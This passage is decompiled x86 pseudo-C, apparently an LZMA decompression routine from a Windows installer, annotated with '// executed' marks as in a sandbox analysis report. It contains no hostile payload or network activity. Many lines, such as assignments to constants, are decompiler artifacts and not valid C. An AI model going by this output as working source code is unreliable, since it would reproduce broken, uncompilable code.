                                                                  									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                  									L54:
                                                                  									__al =  *(__ebp - 0x44);
                                                                  									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                  									L55:
                                                                  									if( *(__ebp - 0x64) == 0) {
                                                                  										 *(__ebp - 0x88) = 0x1a;
                                                                  										goto L170;
                                                                  									}
                                                                  									__ecx =  *(__ebp - 0x68);
                                                                  									__al =  *(__ebp - 0x5c);
                                                                  									__edx =  *(__ebp - 8);
                                                                  									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                  									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                  									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                  									 *( *(__ebp - 0x68)) = __al;
                                                                  									__ecx =  *(__ebp - 0x14);
                                                                  									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                  									__eax = __ecx + 1;
                                                                  									__edx = 0;
                                                                  									_t191 = __eax %  *(__ebp - 0x74);
                                                                  									__eax = __eax /  *(__ebp - 0x74);
                                                                  									__edx = _t191;
                                                                  									L79:
                                                                  									 *(__ebp - 0x14) = __edx;
                                                                  									L80:
                                                                  									 *(__ebp - 0x88) = 2;
                                                                  									goto L1;
                                                                  								}
                                                                  								if(__ebx >= 0x100) {
                                                                  									goto L53;
                                                                  								}
                                                                  								goto L40;
                                                                  							} else {
                                                                  								L36:
                                                                  								if( *(__ebp - 0x6c) == 0) {
                                                                  									 *(__ebp - 0x88) = 0xd;
                                                                  									L170:
                                                                  									_t568 = 0x22;
                                                                  									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                  									_t535 = 0;
                                                                  									L172:
                                                                  									return _t535;
                                                                  								}
                                                                  								__ecx =  *(__ebp - 0x70);
                                                                  								__eax =  *(__ebp - 0xc);
                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  								_t121 = __ebp - 0x70;
                                                                  								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  								goto L38;
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  					L1:
                                                                  					_t534 =  *(_t614 - 0x88);
                                                                  					if(_t534 > 0x1c) {
                                                                  						L171:
                                                                  						_t535 = _t534 | 0xffffffff;
                                                                  						goto L172;
                                                                  					}
                                                                  					switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
                                                                  						case 0:
                                                                  							if( *(_t614 - 0x6c) == 0) {
                                                                  								goto L170;
                                                                  							}
                                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                  							_t534 =  *( *(_t614 - 0x70));
                                                                  							if(_t534 > 0xe1) {
                                                                  								goto L171;
                                                                  							}
                                                                  							_t538 = _t534 & 0x000000ff;
                                                                  							_push(0x2d);
                                                                  							asm("cdq");
                                                                  							_pop(_t570);
                                                                  							_push(9);
                                                                  							_pop(_t571);
                                                                  							_t610 = _t538 / _t570;
                                                                  							_t540 = _t538 % _t570 & 0x000000ff;
                                                                  							asm("cdq");
                                                                  							_t605 = _t540 % _t571 & 0x000000ff;
                                                                  							 *(_t614 - 0x3c) = _t605;
                                                                  							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                  							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                  							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                  							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                  								L10:
                                                                  								if(_t613 == 0) {
                                                                  									L12:
                                                                  									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                  									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                  									goto L15;
                                                                  								} else {
                                                                  									goto L11;
                                                                  								}
                                                                  								do {
                                                                  									L11:
                                                                  									_t613 = _t613 - 1;
                                                                  									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                  								} while (_t613 != 0);
                                                                  								goto L12;
                                                                  							}
                                                                  							if( *(_t614 - 4) != 0) {
                                                                  								GlobalFree( *(_t614 - 4));
                                                                  							}
                                                                  							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                  							 *(_t614 - 4) = _t534;
                                                                  							if(_t534 == 0) {
                                                                  								goto L171;
                                                                  							} else {
                                                                  								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                  								goto L10;
                                                                  							}
                                                                  						case 1:
                                                                  							L13:
                                                                  							__eflags =  *(_t614 - 0x6c);
                                                                  							if( *(_t614 - 0x6c) == 0) {
                                                                  								 *(_t614 - 0x88) = 1;
                                                                  								goto L170;
                                                                  							}
                                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                  							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                  							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                  							_t45 = _t614 - 0x48;
                                                                  							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                  							__eflags =  *_t45;
                                                                  							L15:
                                                                  							if( *(_t614 - 0x48) < 4) {
                                                                  								goto L13;
                                                                  							}
                                                                  							_t546 =  *(_t614 - 0x40);
                                                                  							if(_t546 ==  *(_t614 - 0x74)) {
                                                                  								L20:
                                                                  								 *(_t614 - 0x48) = 5;
                                                                  								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                  								goto L23;
                                                                  							}
                                                                  							 *(_t614 - 0x74) = _t546;
                                                                  							if( *(_t614 - 8) != 0) {
                                                                  								GlobalFree( *(_t614 - 8));
                                                                  							}
                                                                  							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                  							 *(_t614 - 8) = _t534;
                                                                  							if(_t534 == 0) {
                                                                  								goto L171;
                                                                  							} else {
                                                                  								goto L20;
                                                                  							}
                                                                  						case 2:
                                                                  							L24:
                                                                  							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                  							 *(_t614 - 0x84) = 6;
                                                                  							 *(_t614 - 0x4c) = _t553;
                                                                  							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                  							goto L132;
                                                                  						case 3:
                                                                  							L21:
                                                                  							__eflags =  *(_t614 - 0x6c);
                                                                  							if( *(_t614 - 0x6c) == 0) {
                                                                  								 *(_t614 - 0x88) = 3;
                                                                  								goto L170;
                                                                  							}
                                                                  							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                  							_t67 = _t614 - 0x70;
                                                                  							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                  							__eflags =  *_t67;
                                                                  							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                  							L23:
                                                                  							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                  							if( *(_t614 - 0x48) != 0) {
                                                                  								goto L21;
                                                                  							}
                                                                  							goto L24;
                                                                  						case 4:
                                                                  							goto L133;
                                                                  						case 5:
                                                                  							goto L137;
                                                                  						case 6:
                                                                  							goto L0;
                                                                  						case 7:
                                                                  							__eflags =  *(__ebp - 0x40) - 1;
                                                                  							if( *(__ebp - 0x40) != 1) {
                                                                  								__eax =  *(__ebp - 0x24);
                                                                  								 *(__ebp - 0x80) = 0x16;
                                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                  								__eax =  *(__ebp - 0x28);
                                                                  								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                  								__eax =  *(__ebp - 0x2c);
                                                                  								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                  								__eax = 0;
                                                                  								__eflags =  *(__ebp - 0x38) - 7;
                                                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                  								__al = __al & 0x000000fd;
                                                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                  								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                  								__eax =  *(__ebp - 4);
                                                                  								__eax =  *(__ebp - 4) + 0x664;
                                                                  								__eflags = __eax;
                                                                  								 *(__ebp - 0x58) = __eax;
                                                                  								goto L68;
                                                                  							}
                                                                  							__eax =  *(__ebp - 4);
                                                                  							__ecx =  *(__ebp - 0x38);
                                                                  							 *(__ebp - 0x84) = 8;
                                                                  							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                  							goto L132;
                                                                  						case 8:
                                                                  							__eflags =  *(__ebp - 0x40);
                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                  								__eax =  *(__ebp - 4);
                                                                  								__ecx =  *(__ebp - 0x38);
                                                                  								 *(__ebp - 0x84) = 0xa;
                                                                  								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                  							} else {
                                                                  								__eax =  *(__ebp - 0x38);
                                                                  								__ecx =  *(__ebp - 4);
                                                                  								__eax =  *(__ebp - 0x38) + 0xf;
                                                                  								 *(__ebp - 0x84) = 9;
                                                                  								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                  								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                  							}
                                                                  							goto L132;
                                                                  						case 9:
                                                                  							__eflags =  *(__ebp - 0x40);
                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                  								goto L89;
                                                                  							}
                                                                  							__eflags =  *(__ebp - 0x60);
                                                                  							if( *(__ebp - 0x60) == 0) {
                                                                  								goto L171;
                                                                  							}
                                                                  							__eax = 0;
                                                                  							__eflags =  *(__ebp - 0x38) - 7;
                                                                  							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                  							__eflags = _t258;
                                                                  							0 | _t258 = _t258 + _t258 + 9;
                                                                  							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                  							goto L75;
                                                                  						case 0xa:
                                                                  							__eflags =  *(__ebp - 0x40);
                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                  								__eax =  *(__ebp - 4);
                                                                  								__ecx =  *(__ebp - 0x38);
                                                                  								 *(__ebp - 0x84) = 0xb;
                                                                  								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                  								goto L132;
                                                                  							}
                                                                  							__eax =  *(__ebp - 0x28);
                                                                  							goto L88;
                                                                  						case 0xb:
                                                                  							__eflags =  *(__ebp - 0x40);
                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                  								__ecx =  *(__ebp - 0x24);
                                                                  								__eax =  *(__ebp - 0x20);
                                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                  							} else {
                                                                  								__eax =  *(__ebp - 0x24);
                                                                  							}
                                                                  							__ecx =  *(__ebp - 0x28);
                                                                  							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                  							L88:
                                                                  							__ecx =  *(__ebp - 0x2c);
                                                                  							 *(__ebp - 0x2c) = __eax;
                                                                  							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                  							L89:
                                                                  							__eax =  *(__ebp - 4);
                                                                  							 *(__ebp - 0x80) = 0x15;
                                                                  							__eax =  *(__ebp - 4) + 0xa68;
                                                                  							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                  							goto L68;
                                                                  						case 0xc:
                                                                  							L99:
                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                  								 *(__ebp - 0x88) = 0xc;
                                                                  								goto L170;
                                                                  							}
                                                                  							__ecx =  *(__ebp - 0x70);
                                                                  							__eax =  *(__ebp - 0xc);
                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							_t334 = __ebp - 0x70;
                                                                  							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                  							__eflags =  *_t334;
                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							__eax =  *(__ebp - 0x2c);
                                                                  							goto L101;
                                                                  						case 0xd:
                                                                  							goto L36;
                                                                  						case 0xe:
                                                                  							goto L45;
                                                                  						case 0xf:
                                                                  							goto L57;
                                                                  						case 0x10:
                                                                  							L109:
                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                  								 *(__ebp - 0x88) = 0x10;
                                                                  								goto L170;
                                                                  							}
                                                                  							__ecx =  *(__ebp - 0x70);
                                                                  							__eax =  *(__ebp - 0xc);
                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							_t365 = __ebp - 0x70;
                                                                  							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                  							__eflags =  *_t365;
                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							goto L111;
                                                                  						case 0x11:
                                                                  							L68:
                                                                  							__esi =  *(__ebp - 0x58);
                                                                  							 *(__ebp - 0x84) = 0x12;
                                                                  							goto L132;
                                                                  						case 0x12:
                                                                  							__eflags =  *(__ebp - 0x40);
                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                  								__eax =  *(__ebp - 0x58);
                                                                  								 *(__ebp - 0x84) = 0x13;
                                                                  								__esi =  *(__ebp - 0x58) + 2;
                                                                  								goto L132;
                                                                  							}
                                                                  							__eax =  *(__ebp - 0x4c);
                                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                  							__ecx =  *(__ebp - 0x58);
                                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                                  							__eflags = __eax;
                                                                  							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                  							goto L130;
                                                                  						case 0x13:
                                                                  							__eflags =  *(__ebp - 0x40);
                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                  								_t469 = __ebp - 0x58;
                                                                  								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                  								__eflags =  *_t469;
                                                                  								 *(__ebp - 0x30) = 0x10;
                                                                  								 *(__ebp - 0x40) = 8;
                                                                  								L144:
                                                                  								 *(__ebp - 0x7c) = 0x14;
                                                                  								goto L145;
                                                                  							}
                                                                  							__eax =  *(__ebp - 0x4c);
                                                                  							__ecx =  *(__ebp - 0x58);
                                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                                  							 *(__ebp - 0x30) = 8;
                                                                  							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                  							L130:
                                                                  							 *(__ebp - 0x58) = __eax;
                                                                  							 *(__ebp - 0x40) = 3;
                                                                  							goto L144;
                                                                  						case 0x14:
                                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                  							__eax =  *(__ebp - 0x80);
                                                                  							goto L140;
                                                                  						case 0x15:
                                                                  							__eax = 0;
                                                                  							__eflags =  *(__ebp - 0x38) - 7;
                                                                  							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                  							__al = __al & 0x000000fd;
                                                                  							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                  							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                  							goto L120;
                                                                  						case 0x16:
                                                                  							__eax =  *(__ebp - 0x30);
                                                                  							__eflags = __eax - 4;
                                                                  							if(__eax >= 4) {
                                                                  								_push(3);
                                                                  								_pop(__eax);
                                                                  							}
                                                                  							__ecx =  *(__ebp - 4);
                                                                  							 *(__ebp - 0x40) = 6;
                                                                  							__eax = __eax << 7;
                                                                  							 *(__ebp - 0x7c) = 0x19;
                                                                  							 *(__ebp - 0x58) = __eax;
                                                                  							goto L145;
                                                                  						case 0x17:
                                                                  							L145:
                                                                  							__eax =  *(__ebp - 0x40);
                                                                  							 *(__ebp - 0x50) = 1;
                                                                  							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                  							goto L149;
                                                                  						case 0x18:
                                                                  							L146:
                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                  								 *(__ebp - 0x88) = 0x18;
                                                                  								goto L170;
                                                                  							}
                                                                  							__ecx =  *(__ebp - 0x70);
                                                                  							__eax =  *(__ebp - 0xc);
                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							_t484 = __ebp - 0x70;
                                                                  							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                  							__eflags =  *_t484;
                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							L148:
                                                                  							_t487 = __ebp - 0x48;
                                                                  							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                  							__eflags =  *_t487;
                                                                  							L149:
                                                                  							__eflags =  *(__ebp - 0x48);
                                                                  							if( *(__ebp - 0x48) <= 0) {
                                                                  								__ecx =  *(__ebp - 0x40);
                                                                  								__ebx =  *(__ebp - 0x50);
                                                                  								0 = 1;
                                                                  								__eax = 1 << __cl;
                                                                  								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                  								__eax =  *(__ebp - 0x7c);
                                                                  								 *(__ebp - 0x44) = __ebx;
                                                                  								goto L140;
                                                                  							}
                                                                  							__eax =  *(__ebp - 0x50);
                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                  							__eax =  *(__ebp - 0x58);
                                                                  							__esi = __edx + __eax;
                                                                  							 *(__ebp - 0x54) = __esi;
                                                                  							__ax =  *__esi;
                                                                  							__edi = __ax & 0x0000ffff;
                                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  								__cx = __ax;
                                                                  								__cx = __ax >> 5;
                                                                  								__eax = __eax - __ecx;
                                                                  								__edx = __edx + 1;
                                                                  								__eflags = __edx;
                                                                  								 *__esi = __ax;
                                                                  								 *(__ebp - 0x50) = __edx;
                                                                  							} else {
                                                                  								 *(__ebp - 0x10) = __ecx;
                                                                  								0x800 = 0x800 - __edi;
                                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                  								 *__esi = __cx;
                                                                  							}
                                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  								goto L148;
                                                                  							} else {
                                                                  								goto L146;
                                                                  							}
                                                                  						case 0x19:
                                                                  							__eflags = __ebx - 4;
                                                                  							if(__ebx < 4) {
                                                                  								 *(__ebp - 0x2c) = __ebx;
                                                                  								L119:
                                                                  								_t393 = __ebp - 0x2c;
                                                                  								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                  								__eflags =  *_t393;
                                                                  								L120:
                                                                  								__eax =  *(__ebp - 0x2c);
                                                                  								__eflags = __eax;
                                                                  								if(__eax == 0) {
                                                                  									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                  									goto L170;
                                                                  								}
                                                                  								__eflags = __eax -  *(__ebp - 0x60);
                                                                  								if(__eax >  *(__ebp - 0x60)) {
                                                                  									goto L171;
                                                                  								}
                                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                  								__eax =  *(__ebp - 0x30);
                                                                  								_t400 = __ebp - 0x60;
                                                                  								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                  								__eflags =  *_t400;
                                                                  								goto L123;
                                                                  							}
                                                                  							__ecx = __ebx;
                                                                  							__eax = __ebx;
                                                                  							__ecx = __ebx >> 1;
                                                                  							__eax = __ebx & 0x00000001;
                                                                  							__ecx = (__ebx >> 1) - 1;
                                                                  							__al = __al | 0x00000002;
                                                                  							__eax = (__ebx & 0x00000001) << __cl;
                                                                  							__eflags = __ebx - 0xe;
                                                                  							 *(__ebp - 0x2c) = __eax;
                                                                  							if(__ebx >= 0xe) {
                                                                  								__ebx = 0;
                                                                  								 *(__ebp - 0x48) = __ecx;
                                                                  								L102:
                                                                  								__eflags =  *(__ebp - 0x48);
                                                                  								if( *(__ebp - 0x48) <= 0) {
                                                                  									__eax = __eax + __ebx;
                                                                  									 *(__ebp - 0x40) = 4;
                                                                  									 *(__ebp - 0x2c) = __eax;
                                                                  									__eax =  *(__ebp - 4);
                                                                  									__eax =  *(__ebp - 4) + 0x644;
                                                                  									__eflags = __eax;
                                                                  									L108:
                                                                  									__ebx = 0;
                                                                  									 *(__ebp - 0x58) = __eax;
                                                                  									 *(__ebp - 0x50) = 1;
                                                                  									 *(__ebp - 0x44) = 0;
                                                                  									 *(__ebp - 0x48) = 0;
                                                                  									L112:
                                                                  									__eax =  *(__ebp - 0x40);
                                                                  									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                  									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                  										_t391 = __ebp - 0x2c;
                                                                  										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                  										__eflags =  *_t391;
                                                                  										goto L119;
                                                                  									}
                                                                  									__eax =  *(__ebp - 0x50);
                                                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                  									__eax =  *(__ebp - 0x58);
                                                                  									__esi = __edi + __eax;
                                                                  									 *(__ebp - 0x54) = __esi;
                                                                  									__ax =  *__esi;
                                                                  									__ecx = __ax & 0x0000ffff;
                                                                  									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                  									__eflags =  *(__ebp - 0xc) - __edx;
                                                                  									if( *(__ebp - 0xc) >= __edx) {
                                                                  										__ecx = 0;
                                                                  										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                  										__ecx = 1;
                                                                  										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                  										__ebx = 1;
                                                                  										__ecx =  *(__ebp - 0x48);
                                                                  										__ebx = 1 << __cl;
                                                                  										__ecx = 1 << __cl;
                                                                  										__ebx =  *(__ebp - 0x44);
                                                                  										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                  										__cx = __ax;
                                                                  										__cx = __ax >> 5;
                                                                  										__eax = __eax - __ecx;
                                                                  										__edi = __edi + 1;
                                                                  										__eflags = __edi;
                                                                  										 *(__ebp - 0x44) = __ebx;
                                                                  										 *__esi = __ax;
                                                                  										 *(__ebp - 0x50) = __edi;
                                                                  									} else {
                                                                  										 *(__ebp - 0x10) = __edx;
                                                                  										0x800 = 0x800 - __ecx;
                                                                  										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                  										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                  										 *__esi = __dx;
                                                                  									}
                                                                  									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  										L111:
                                                                  										_t368 = __ebp - 0x48;
                                                                  										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                  										__eflags =  *_t368;
                                                                  										goto L112;
                                                                  									} else {
                                                                  										goto L109;
                                                                  									}
                                                                  								}
                                                                  								__ecx =  *(__ebp - 0xc);
                                                                  								__ebx = __ebx + __ebx;
                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                  								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                  								 *(__ebp - 0x44) = __ebx;
                                                                  								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                  									__ecx =  *(__ebp - 0x10);
                                                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                  									__ebx = __ebx | 0x00000001;
                                                                  									__eflags = __ebx;
                                                                  									 *(__ebp - 0x44) = __ebx;
                                                                  								}
                                                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  									L101:
                                                                  									_t338 = __ebp - 0x48;
                                                                  									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                  									__eflags =  *_t338;
                                                                  									goto L102;
                                                                  								} else {
                                                                  									goto L99;
                                                                  								}
                                                                  							}
                                                                  							__edx =  *(__ebp - 4);
                                                                  							__eax = __eax - __ebx;
                                                                  							 *(__ebp - 0x40) = __ecx;
                                                                  							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                  							goto L108;
                                                                  						case 0x1a:
                                                                  							goto L55;
                                                                  						case 0x1b:
                                                                  							L75:
                                                                  							__eflags =  *(__ebp - 0x64);
                                                                  							if( *(__ebp - 0x64) == 0) {
                                                                  								 *(__ebp - 0x88) = 0x1b;
                                                                  								goto L170;
                                                                  							}
                                                                  							__eax =  *(__ebp - 0x14);
                                                                  							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  							__eflags = __eax -  *(__ebp - 0x74);
                                                                  							if(__eax >=  *(__ebp - 0x74)) {
                                                                  								__eax = __eax +  *(__ebp - 0x74);
                                                                  								__eflags = __eax;
                                                                  							}
                                                                  							__edx =  *(__ebp - 8);
                                                                  							__cl =  *(__eax + __edx);
                                                                  							__eax =  *(__ebp - 0x14);
                                                                  							 *(__ebp - 0x5c) = __cl;
                                                                  							 *(__eax + __edx) = __cl;
                                                                  							__eax = __eax + 1;
                                                                  							__edx = 0;
                                                                  							_t274 = __eax %  *(__ebp - 0x74);
                                                                  							__eax = __eax /  *(__ebp - 0x74);
                                                                  							__edx = _t274;
                                                                  							__eax =  *(__ebp - 0x68);
                                                                  							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                  							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                  							_t283 = __ebp - 0x64;
                                                                  							 *_t283 =  *(__ebp - 0x64) - 1;
                                                                  							__eflags =  *_t283;
                                                                  							 *( *(__ebp - 0x68)) = __cl;
                                                                  							goto L79;
                                                                  						case 0x1c:
                                                                  							while(1) {
                                                                  								L123:
                                                                  								__eflags =  *(__ebp - 0x64);
                                                                  								if( *(__ebp - 0x64) == 0) {
                                                                  									break;
                                                                  								}
                                                                  								__eax =  *(__ebp - 0x14);
                                                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  								__eflags = __eax -  *(__ebp - 0x74);
                                                                  								if(__eax >=  *(__ebp - 0x74)) {
                                                                  									__eax = __eax +  *(__ebp - 0x74);
                                                                  									__eflags = __eax;
                                                                  								}
                                                                  								__edx =  *(__ebp - 8);
                                                                  								__cl =  *(__eax + __edx);
                                                                  								__eax =  *(__ebp - 0x14);
                                                                  								 *(__ebp - 0x5c) = __cl;
                                                                  								 *(__eax + __edx) = __cl;
                                                                  								__eax = __eax + 1;
                                                                  								__edx = 0;
                                                                  								_t414 = __eax %  *(__ebp - 0x74);
                                                                  								__eax = __eax /  *(__ebp - 0x74);
                                                                  								__edx = _t414;
                                                                  								__eax =  *(__ebp - 0x68);
                                                                  								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                  								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                  								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                  								__eflags =  *(__ebp - 0x30);
                                                                  								 *( *(__ebp - 0x68)) = __cl;
                                                                  								 *(__ebp - 0x14) = __edx;
                                                                  								if( *(__ebp - 0x30) > 0) {
                                                                  									continue;
                                                                  								} else {
                                                                  									goto L80;
                                                                  								}
                                                                  							}
                                                                  							 *(__ebp - 0x88) = 0x1c;
